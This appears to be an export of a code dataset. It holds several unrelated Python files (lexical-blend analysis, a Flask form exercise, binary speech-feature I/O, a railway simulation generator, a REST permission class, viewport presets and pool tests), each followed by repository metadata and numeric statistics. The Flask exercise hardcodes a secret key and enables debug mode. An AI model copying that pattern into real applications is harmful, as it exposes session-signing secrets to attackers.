# G[k][li]['weight'] += 1
# else:
# G.add_edge(k, li, weight=1)
# if G.jas
def get_candidates():
lexicon = 'saldo'
corpus = 'news'
candidate_folder = f'/home/adam/Documents/lexical_blends_project/{lexicon}_blends_candidates_noverlap_1/'
c_set = set()
for i, filename in enumerate(listdir(candidate_folder)):
blend = filename.split('_')[0]
print('### reading blend:', i, blend)
with open(candidate_folder+filename) as f:
for ln in f:
cw1, cw2 = ln.rstrip().split(',')
c_set.add(cw1)
c_set.add(cw2)
return c_set
def nst_obj(filename):
nst = defaultdict(int)
with open(filename, encoding='iso-8859-1') as f:
for i, line in enumerate(f):
if line.startswith('!') or line.startswith('-'):
continue
line = line.split(';')
seg = line[0]
pos = line[1]
sampa = line[11]
while '|' in pos:
pos = pos.split('|')[0]
nst[seg.lower()] = (pos, sampa)
return nst
if __name__ == '__main__':
#with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', '+wb') as f:
# nst = nst_obj('/home/adam/data/NST_svensk_leksikon/swe030224NST.pron/swe030224NST.pron')
# pickle.dump(nst, f)
#with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', '+wb') as f:
# saldo = saldo_obj('/home/adam/data/saldo_2.3/saldo20v03.txt')
# pickle.dump(saldo, f)
with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', 'rb') as f:
nst = pickle.load(f)
with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', 'rb') as f:
saldo = pickle.load(f)
c_set = get_candidates()
print(list(saldo.keys())[:100])
print(list(nst.keys())[:100])
n_set = set(nst.keys())
s_set = set(saldo.keys())
true = len(c_set.intersection(n_set))/len(c_set)
print(true)
| 29.596154 | 109 | 0.556855 | 414 | 3,078 | 3.987923 | 0.277778 | 0.033919 | 0.051484 | 0.072683 | 0.312538 | 0.264082 | 0.190188 | 0.17868 | 0.17868 | 0.152029 | 0 | 0.022263 | 0.299545 | 3,078 | 103 | 110 | 29.883495 | 0.743506 | 0.27258 | 0 | 0.033898 | 0 | 0 | 0.12291 | 0.095346 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050847 | false | 0 | 0.084746 | 0 | 0.186441 | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cc7b20cfa963b9093b9d8a0f7b606c9c72c66a | 1,737 | py | Python | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, redirect, url_for
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import Required
import csv
app = Flask(__name__)
app.config['DEBUG'] = True
# Flask-WTF requires an enryption key - the string can be anything
app.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'
# Flask-Bootstrap requires this line
Bootstrap(app)
# ---------------------------------------------------------------------------
# with Flask-WTF, each web form is represented by a class
# "RestForm" can be changed; "(FlaskForm)" cannot
# see the route for "/" to see how this is used
class RestForm(FlaskForm):
restaurant = StringField('Restaurant name', validators=[Required()])
submit = SubmitField('Submit')
# Exercise:
# add: address, city, state, zip, phone, url, cuisine, price_range
# make price_range a select element with choice of $ to $$$$
# make all fields required except submit
# ---------------------------------------------------------------------------
# all Flask routes below
@app.route('/', methods=['GET', 'POST'])
def index():
form = RestForm()
# Exercise:
# Make the form write a new row into restaurants.csv
# with if form.validate_on_submit()
return render_template('index.html', form=form)
@app.route('/restaurants')
def restaurants():
csvfile = open('restaurants.csv', newline='')
myreader = csv.reader(csvfile, delimiter=',')
list_of_rows = []
for row in myreader:
list_of_rows.append(row)
csvfile.close()
return render_template('rest.html',rests=list_of_rows)
# keep this as is
if __name__ == '__main__':
app.run(debug=True)
| 31.017857 | 77 | 0.65688 | 213 | 1,737 | 5.220657 | 0.497653 | 0.024281 | 0.026978 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004087 | 0.154865 | 1,737 | 55 | 78 | 31.581818 | 0.753406 | 0.408751 | 0 | 0 | 0 | 0 | 0.129703 | 0.031683 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.464286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cd738342d6d3e6c1d28d3273ebe5ae8755466f | 8,015 | py | Python | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
io_tools
Functions to load data
"""
from __future__ import absolute_import
import os
import sys
import json
import numpy as np
__author__ = "Xin Wang"
__email__ = "wangxin@nii.ac.jp"
__copyright__ = "Copyright 2020, Xin Wang"
def f_read_raw_mat(filename, col, data_format='f4', end='l'):
"""read_raw_mat(filename,col,data_format='float',end='l')
Read the binary data from filename
Return data, which is a (N, col) array
filename: the name of the file, take care about '\\'
col: the number of column of the data
format: please use the Python protocal to write format
default: 'f4', float32
see for more format:
end: little endian 'l' or big endian 'b'?
default: 'l'
dependency: numpy
Note: to read the raw binary data in python, the question
is how to interprete the binary data. We can use
struct.unpack('f',read_data) to interprete the data
as float, however, it is slow.
"""
f = open(filename,'rb')
if end=='l':
data_format = '<'+data_format
elif end=='b':
data_format = '>'+data_format
else:
data_format = '='+data_format
datatype = np.dtype((data_format,(col,)))
data = np.fromfile(f,dtype=datatype)
f.close()
if data.ndim == 2 and data.shape[1] == 1:
return data[:,0]
else:
return data
def f_read_raw_mat_length(filename, data_format='f4'):
"""f_read_raw_mat_length(filename,data_format='float',end='l')
Read length of data
"""
f = open(filename,'rb')
tmp = f.seek(0, 2)
bytes_num = f.tell()
f.close()
if data_format == 'f4':
return int(bytes_num / 4)
else:
return bytes_num
def f_read_htk(filename, data_format='f4', end='l'):
"""read_htk(filename, data_format='f4', end='l')
Read HTK File and return the data as numpy.array
filename: input file name
data_format: the data_format of the data
default: 'f4' float32
end: little endian 'l' or big endian 'b'?
default: 'l'
"""
if end=='l':
data_format = '<'+data_format
data_formatInt4 = '<i4'
data_formatInt2 = '<i2'
elif end=='b':
data_format = '>'+data_format
data_formatInt4 = '>i4'
data_formatInt2 = '>i2'
else:
data_format = '='+data_format
data_formatInt4 = '=i4'
data_formatInt2 = '=i2'
head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4),
('SampleSize',data_formatInt2), ('kind',data_formatInt2)])
f = open(filename,'rb')
head_info = np.fromfile(f,dtype=head_type,count=1)
"""if end=='l':
data_format = '<'+data_format
elif end=='b':
data_format = '>'+data_format
else:
data_format = '='+data_format
"""
if 'f' in data_format:
sample_size = int(head_info['SampleSize'][0]/4)
else:
print("Error in read_htk: input should be float32")
return False
datatype = np.dtype((data_format,(sample_size,)))
data = np.fromfile(f,dtype=datatype)
f.close()
return data
def f_read_htk_length(filename, data_format='f4', end='l'):
"""read_htk(filename, data_format='f4', end='l')
Read HTK File and return the data as numpy.array
filename: input file name
data_format: the data_format of the data
default: 'f4' float32
end: little endian 'l' or big endian 'b'?
default: 'l'
"""
if end=='l':
data_format = '<'+data_format
data_formatInt4 = '<i4'
data_formatInt2 = '<i2'
elif end=='b':
data_format = '>'+data_format
data_formatInt4 = '>i4'
data_formatInt2 = '>i2'
else:
data_format = '='+data_format
data_formatInt4 = '=i4'
data_formatInt2 = '=i2'
head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4),
('SampleSize',data_formatInt2), ('kind',data_formatInt2)])
f = open(filename,'rb')
head_info = np.fromfile(f,dtype=head_type,count=1)
f.close()
sample_size = int(head_info['SampleSize'][0]/4)
return sample_size
def f_write_raw_mat(data,filename,data_format='f4',end='l'):
"""write_raw_mat(data,filename,data_format='',end='l')
Write the binary data from filename.
Return True
data: np.array
filename: the name of the file, take care about '\\'
data_format: please use the Python protocal to write data_format
default: 'f4', float32
end: little endian 'l' or big endian 'b'?
default: '', only when data_format is specified, end
is effective
dependency: numpy
Note: we can also write two for loop to write the data using
f.write(data[a][b]), but it is too slow
"""
if not isinstance(data, np.ndarray):
print("Error write_raw_mat: input shoul be np.array")
return False
f = open(filename,'wb')
if len(data_format)>0:
if end=='l':
data_format = '<'+data_format
elif end=='b':
data_format = '>'+data_format
else:
data_format = '='+data_format
datatype = np.dtype(data_format)
temp_data = data.astype(datatype)
else:
temp_data = data
temp_data.tofile(f,'')
f.close()
return True
def f_write_htk(data,targetfile,sampPeriod=50000,sampKind=9,data_format='f4',end='l'):
"""
write_htk(data,targetfile,
sampPeriod=50000,sampKind=9,data_format='f4',end='l')
"""
if data.ndim==1:
nSamples, vDim = data.shape[0], 1
else:
nSamples, vDim = data.shape
if data_format=='f4':
sampSize = vDim * 4;
else:
sampSize = vDim * 8;
f = open(targetfile,'wb')
if len(data_format)>0:
if end=='l':
data_format1 = '<i4'
data_format2 = '<i2'
elif end=='b':
data_format1 = '>i4'
data_format2 = '>i2'
else:
data_format1 = '=i4'
data_format2 = '=i2'
temp_data = np.array([nSamples, sampPeriod],
dtype=np.dtype(data_format))
temp_data.tofile(f, '')
temp_data = np.array([sampSize, sampKind], dtype=np.dtype(data_format2))
temp_data.tofile(f, '')
if len(data_format)>0:
if end=='l':
data_format = '<'+data_format
elif end=='b':
data_format = '>'+data_format
else:
data_format = '='+data_format
datatype = np.dtype(data_format)
temp_data = data.astype(datatype)
else:
temp_data = data
temp_data.tofile(f, '')
f.close()
return True
def read_dic(file_path):
""" dic = read_dic(file_path)
Read a json file from file_path and return a dictionary
Args:
file_path: string, path to the file
Returns:
dic: a dictionary
"""
try:
data = json.load( open(file_path) )
except IOError:
print("Cannot find %s" % (file_path))
sys.exit(1)
except json.decoder.JSONDecodeError:
print("Cannot parse %s" % (file_path))
sys.exit(1)
return data
def write_dic(dic, file_path):
""" write_dic(dic, file_path)
Write a dictionary to file
Args:
dic: dictionary to be dumped
file_path: file to store the dictionary
"""
try:
json.dump(dic, open(file_path, 'w'))
except IOError:
print("Cannot write to %s " % (file_path))
sys.exit(1)
def file_exist(file_path):
""" file_exit(file_path)
Whether file exists
"""
return os.path.isfile(file_path) or os.path.islink(file_path)
| 29.251825 | 86 | 0.572302 | 1,044 | 8,015 | 4.211686 | 0.177203 | 0.152377 | 0.076416 | 0.081874 | 0.622697 | 0.605413 | 0.538776 | 0.509666 | 0.46327 | 0.443712 | 0 | 0.019724 | 0.30418 | 8,015 | 273 | 87 | 29.358974 | 0.768693 | 0.283843 | 0 | 0.655844 | 0 | 0 | 0.073123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058442 | false | 0 | 0.032468 | 0 | 0.168831 | 0.032468 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cf36edc22c7f7e4d4a27e2cc587f5fe4069278 | 3,000 | py | Python | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | 4 | 2021-01-15T10:49:33.000Z | 2021-12-31T08:11:35.000Z | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | null | null | null | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | null | null | null | import logging
import random
from typing import NamedTuple
from flatland.envs.malfunction_generators import malfunction_from_params
# from flatland.envs.rail_env import RailEnv
from envs.flatland.utils.gym_env_wrappers import FlatlandRenderWrapper as RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
MalfunctionParameters = NamedTuple('MalfunctionParameters', [('malfunction_rate', float), ('min_duration', int), ('max_duration', int)])
def random_sparse_env_small(random_seed, max_width, max_height, observation_builder):
random.seed(random_seed)
size = random.randint(0, 5)
width = 20 + size * 5
height = 20 + size * 5
nr_cities = 2 + size // 2 + random.randint(0, 2)
nr_trains = min(nr_cities * 5, 5 + random.randint(0, 5)) # , 10 + random.randint(0, 10))
max_rails_between_cities = 2
max_rails_in_cities = 3 + random.randint(0, size)
malfunction_rate = 30 + random.randint(0, 100)
malfunction_min_duration = 3 + random.randint(0, 7)
malfunction_max_duration = 20 + random.randint(0, 80)
rail_generator = sparse_rail_generator(max_num_cities=nr_cities, seed=random_seed, grid_mode=False,
max_rails_between_cities=max_rails_between_cities,
max_rails_in_city=max_rails_in_cities)
# new version:
# stochastic_data = MalfunctionParameters(malfunction_rate, malfunction_min_duration, malfunction_max_duration)
stochastic_data = {'malfunction_rate': malfunction_rate, 'min_duration': malfunction_min_duration,
'max_duration': malfunction_max_duration}
schedule_generator = sparse_schedule_generator({1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. / 4.: 0.25})
while width <= max_width and height <= max_height:
try:
env = RailEnv(width=width, height=height, rail_generator=rail_generator,
schedule_generator=schedule_generator, number_of_agents=nr_trains,
malfunction_generator_and_process_data=malfunction_from_params(stochastic_data),
obs_builder_object=observation_builder, remove_agents_at_target=False)
print("[{}] {}x{} {} cities {} trains, max {} rails between cities, max {} rails in cities. Malfunction rate {}, {} to {} steps.".format(
random_seed, width, height, nr_cities, nr_trains, max_rails_between_cities,
max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration
))
return env
except ValueError as e:
logging.error(f"Error: {e}")
width += 5
height += 5
logging.info("Try again with larger env: (w,h):", width, height)
logging.error(f"Unable to generate env with seed={random_seed}, max_width={max_height}, max_height={max_height}")
return None
| 50.847458 | 149 | 0.687 | 374 | 3,000 | 5.200535 | 0.262032 | 0.041131 | 0.057584 | 0.053985 | 0.167095 | 0.167095 | 0.128535 | 0.112596 | 0.05964 | 0.05964 | 0 | 0.025214 | 0.22 | 3,000 | 58 | 150 | 51.724138 | 0.805983 | 0.065 | 0 | 0 | 0 | 0.022727 | 0.128571 | 0.023929 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.159091 | 0 | 0.227273 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cfab6e94dd6a1313e2d99802b5e11a6af2b20d | 616 | py | Python | api/permissions.py | andela-jmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | 2 | 2017-10-07T09:26:46.000Z | 2019-01-20T01:34:13.000Z | api/permissions.py | mrmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | null | null | null | api/permissions.py | mrmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | null | null | null | from rest_framework import permissions
from models import Bucketlist
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Object-level permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
"""
Read permissions are allowed to any request,
so we'll always allow GET, HEAD or OPTIONS requests.
"""
if request.method in permissions.SAFE_METHODS:
return True
if isinstance(obj, Bucketlist):
return obj.created_by == request.user
else:
return obj
| 29.333333 | 73 | 0.652597 | 73 | 616 | 5.438356 | 0.712329 | 0.04534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.282468 | 616 | 20 | 74 | 30.8 | 0.89819 | 0.271104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d01d592715818cd44140b5a297b191c7be3b94 | 1,438 | py | Python | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | 19 | 2016-02-26T18:43:31.000Z | 2021-04-10T18:29:29.000Z | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | null | null | null | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | 8 | 2015-12-14T15:10:09.000Z | 2021-06-12T04:20:36.000Z | # -*- coding: utf-8 -*-
import json
import glob
import os
from . import config
def get_presets():
'''Get a generator yielding preset name, data pairs'''
for path in config.PRESETS_PATH:
for f in glob.glob(os.path.join(path, '*.json')):
base = os.path.basename(f)
name = os.path.splitext(base)[0]
with open(f, 'r') as f:
data = json.loads(f.read())
yield name, data
def get_preset(name):
'''Get a preset by name'''
for n, s in get_presets():
if name == n:
return s
def find_preset(name):
'''Find the path to a given preset...'''
for path in config.PRESETS_PATH:
prospect = os.path.join(path, name + '.json')
if os.path.isfile(prospect):
return prospect
raise ValueError('Could not find a preset named %s', name)
def new_preset(name, data):
'''Create a new preset from viewport state data
:param name: Name of the preset
:param data: Viewport state dict
usage::
import mvp
active = mvp.Viewport.active()
mvp.new_preset('NewPreset1', active.get_state())
'''
preset_path = os.path.join(config.PRESETS_PATH[0], name + '.json')
with open(preset_path, 'w') as f:
f.write(json.dumps(data))
def del_preset(name):
preset_path = find_preset(name)
if os.path.exists(preset_path):
os.remove(preset_path)
| 21.787879 | 70 | 0.596662 | 205 | 1,438 | 4.102439 | 0.331707 | 0.049941 | 0.060642 | 0.035672 | 0.061831 | 0.061831 | 0 | 0 | 0 | 0 | 0 | 0.00385 | 0.277469 | 1,438 | 65 | 71 | 22.123077 | 0.805582 | 0.244089 | 0 | 0.066667 | 0 | 0 | 0.048216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.133333 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d100195ec1f56bb39011ceafce3d09ae2b3187 | 9,539 | py | Python | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 1 | 2019-06-13T21:18:10.000Z | 2019-06-13T21:18:10.000Z | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 11 | 2018-01-16T19:12:12.000Z | 2020-05-11T12:05:56.000Z | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 1 | 2018-01-17T05:36:43.000Z | 2018-01-17T05:36:43.000Z | # -*- coding: utf-8 -*-
"""Tests for Flask-CuttlePool."""
import pytest
from flask import Flask
# Find the stack on which we want to store the database connection.
# Starting with Flask 0.9, the _app_ctx_stack is the correct one,
# before that we need to use the _request_ctx_stack.
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
import mocksql
from flask_cuttlepool import (_CAPACITY, _OVERFLOW, _TIMEOUT, CuttlePool,
FlaskCuttlePool, PoolConnection)
@pytest.fixture
def user():
return 'paul_hollywood'
@pytest.fixture
def password():
return 'bread_is_the_best'
@pytest.fixture
def host():
return 'an_ip_address_in_england'
@pytest.fixture
def user2():
return 'marry_berry'
@pytest.fixture
def password2():
return 'cake_and_margaritas'
@pytest.fixture
def host2():
return 'another_ip_address_in_england'
def create_app(u, p, h):
app = Flask(__name__)
app.testing = True
app.config.update(
CUTTLEPOOL_USER=u,
CUTTLEPOOL_PASSWORD=p,
CUTTLEPOOL_HOST=h
)
return app
@pytest.fixture
def app(user, password, host):
"""A Flask ``app`` instance."""
return create_app(user, password, host)
@pytest.fixture
def app2(user2, password2, host2):
"""A Flask ``app`` instance."""
return create_app(user2, password2, host2)
def add_decorators(p):
"""Adds ping and normalize decorators to pool."""
@p.ping
def ping(con):
return True
@p.normalize_connection
def normalize(con):
pass
@pytest.fixture
def pool_no_app():
"""Pool with no app."""
p = FlaskCuttlePool(mocksql.connect)
add_decorators(p)
return p
@pytest.fixture(params=[1, 2])
def pool_one(request, app):
"""Pool initialized with one app."""
if request.param == 1:
# Pool initialized with app in __init__() only.
pool = FlaskCuttlePool(mocksql.connect, app=app)
elif request.param == 2:
# Pool initialized with app in init_app() only.
pool = FlaskCuttlePool(mocksql.connect)
pool.init_app(app)
add_decorators(pool)
return pool
@pytest.fixture(params=[1, 2])
def pool_two(request, app, app2):
"""Pool initialized with two apps."""
if request.param == 1:
# Pool initialized with one app in __init__() and one app in
# init_app().
pool = FlaskCuttlePool(mocksql.connect, app=app)
pool.init_app(app2)
elif request.param == 2:
# Pool initialized with two apps in init_app() only.
pool = FlaskCuttlePool(mocksql.connect)
pool.init_app(app)
pool.init_app(app2)
add_decorators(pool)
return pool
def test_init_no_app(user, password, host):
"""Test FlaskCuttlePool instantiates properly without an app object."""
pool = FlaskCuttlePool(mocksql.connect, user=user, password=password, host=host)
add_decorators(pool)
assert isinstance(pool, FlaskCuttlePool)
assert pool._cuttlepool_kwargs['capacity'] == _CAPACITY
assert pool._cuttlepool_kwargs['overflow'] == _OVERFLOW
assert pool._cuttlepool_kwargs['timeout'] == _TIMEOUT
assert pool._cuttlepool_kwargs['user'] == user
assert pool._cuttlepool_kwargs['password'] == password
assert pool._cuttlepool_kwargs['host'] == host
def test_init_with_app(app, pool_one, user, password, host):
"""Test FlaskCuttlePool instantiates properly with an app object."""
assert isinstance(pool_one, FlaskCuttlePool)
assert pool_one._cuttlepool_kwargs['capacity'] == _CAPACITY
assert pool_one._cuttlepool_kwargs['overflow'] == _OVERFLOW
assert pool_one._cuttlepool_kwargs['timeout'] == _TIMEOUT
def test_init_two_pools_one_app(app):
"""Test two pools can be used with one app object."""
pool1 = FlaskCuttlePool(mocksql.connect, app=app)
add_decorators(pool1)
pool2 = FlaskCuttlePool(mocksql.connect, app=app)
add_decorators(pool2)
assert pool1.get_pool() is not pool2.get_pool()
def test_get_app_no_init(app):
"""
Tests the ``app`` is returned when ``app`` is only passed to pool
``__init__()``.
"""
pool = FlaskCuttlePool(mocksql.connect, app=app)
add_decorators(pool)
# Test in app context.
with app.app_context():
assert pool._get_app() is app
# Test outside app context.
assert pool._get_app() is app
def test_get_app_multiple(pool_two, app, app2):
"""Tests the correct ``app`` is returned."""
with app.app_context():
assert pool_two._get_app() is app
with app2.app_context():
assert pool_two._get_app() is app2
def test_get_app_no_app():
"""Tests an error is raised when there is no app."""
pool = FlaskCuttlePool(mocksql.connect)
add_decorators(pool)
with pytest.raises(RuntimeError):
pool._get_app()
def test_get_pool(pool_two, app, app2):
"""Tests the proper pool is retreived."""
with app.app_context():
pool = pool_two.get_pool()
# Ensure same pool is returned again.
with app.app_context():
assert pool is pool_two.get_pool()
# Ensure different pool for different app.
with app2.app_context():
assert pool is not pool_two.get_pool()
def test_get_pool_different_apps_and_pools(app, app2):
"""
Tests that connection pools are stored correctly for each pool, app pair.
"""
pool1 = FlaskCuttlePool(mocksql.connect, app=app)
add_decorators(pool1)
# Create another pool with a different app. The call to get_pool() by
# pool1 should attempt to retrieve the pool set by pool2 and fail.
pool2 = FlaskCuttlePool(mocksql.connect, app=app2)
add_decorators(pool2)
with app2.app_context():
with pytest.raises(RuntimeError):
pool1.get_pool()
def test_make_pool(app, user, password, host):
"""Tests _make_pool method."""
pool = FlaskCuttlePool(mocksql.connect)
add_decorators(pool)
p = pool._make_pool(app)
assert isinstance(p, CuttlePool)
con_args = p.connection_arguments
assert con_args['user'] == user
assert con_args['password'] == password
assert con_args['host'] == host
def test_get_connection(app, pool_one):
"""Test get_connection returns a connection."""
with app.app_context():
con = pool_one.get_connection()
assert isinstance(con, PoolConnection)
def test_connection_app_ctx(app, pool_one):
"""Tests the same connection is retrieved from the stack."""
with app.app_context():
con1 = pool_one.connection
assert hasattr(stack.top, 'cuttlepool_connection')
con2 = pool_one.connection
assert con1 is con2
assert pool_one.connection is None
def test_connection_after_close(app, pool_one):
"""Ensure connection property properly handles closed connections."""
with app.app_context():
con = pool_one.connection
con.close()
assert con is not pool_one.connection
assert pool_one.connection.open
def test_connection_multiple_app_ctx(app, pool_one):
"""
Tests connection property saves a different connection to coexisting app
contexts.
"""
with app.app_context():
con1 = pool_one.connection
with app.app_context():
con2 = pool_one.connection
assert con1 is not con2
assert con1 is pool_one.connection
def test_commit(app, pool_one):
"""Tests the commit convenience method."""
with app.app_context():
commit1 = pool_one.connection.commit()
commit2 = pool_one.commit()
assert commit1 is not commit2
assert commit1 == commit2
def test_commit_error(app, pool_one):
"""
Tests a RuntimeError is raised when there's no connection on the
application context.
"""
with pytest.raises(RuntimeError):
# Should raise error since there's no application context.
pool_one.commit()
with app.app_context():
with pytest.raises(RuntimeError):
# Should raise error since there's no connection on the application
# context.
pool_one.commit()
def test_cursor(app, pool_one):
"""Tests a cursor is returned."""
with app.app_context():
cur = pool_one.cursor()
assert isinstance(cur, mocksql.MockCursor)
def test_cursor_accepts_arguments(app, pool_one):
"""Tests a cursor can accept arguments."""
class SuperMockCursor(mocksql.MockCursor):
pass
with app.app_context():
cur = pool_one.cursor(cursorclass=SuperMockCursor)
assert isinstance(cur, SuperMockCursor)
def test_ping_decorator(app, pool_one):
"""Tests the ping decorator is used by the connection pool."""
ping_str = "Decorated ping"
@pool_one.ping
def ping(connection):
return ping_str
with app.app_context():
pool = pool_one.get_pool()
assert pool.ping(None) is ping_str
def test_normalize_connection_decorator(app, pool_one):
"""
Tests the normalize_connection decorator is used by the connection pool.
"""
@pool_one.normalize_connection
def normalize_connection(connection):
connection.append(1)
con = []
with app.app_context():
pool = pool_one.get_pool()
pool.normalize_connection(con)
# Check if con is modified by normalize_connection. If it is that
# means the callback was successfully used by the connection pool.
assert len(con) == 1
assert con[0] == 1
| 27.891813 | 84 | 0.679945 | 1,249 | 9,539 | 4.98799 | 0.156926 | 0.040449 | 0.025682 | 0.040931 | 0.424077 | 0.347673 | 0.250883 | 0.123114 | 0.069663 | 0.039807 | 0 | 0.008622 | 0.221826 | 9,539 | 341 | 85 | 27.973607 | 0.830661 | 0.228745 | 0 | 0.371859 | 0 | 0 | 0.03177 | 0.010357 | 0 | 0 | 0 | 0 | 0.18593 | 1 | 0.180905 | false | 0.075377 | 0.035176 | 0.040201 | 0.291457 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d3badd80eff4da8c9ac59f2ae9e00ec9a2daf0 | 6,516 | py | Python | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from typing import List, Dict
from ..utils.scoringHelpers import *
def listToResult(l: List[int]) -> List[Dict[str, int]]:
return [{"position": item} for item in l]
class Test_countOccurancesOfPosition:
def test_noData(self) -> None:
assert occuracesOfPosition([], False) == 0
assert occuracesOfPosition([], -5) == 0
assert occuracesOfPosition([], 1) == 0
assert occuracesOfPosition([], 55) == 0
def test_noOccurances(self) -> None:
assert occuracesOfPosition(listToResult([5, 4, 3, 2]), 1) == 0
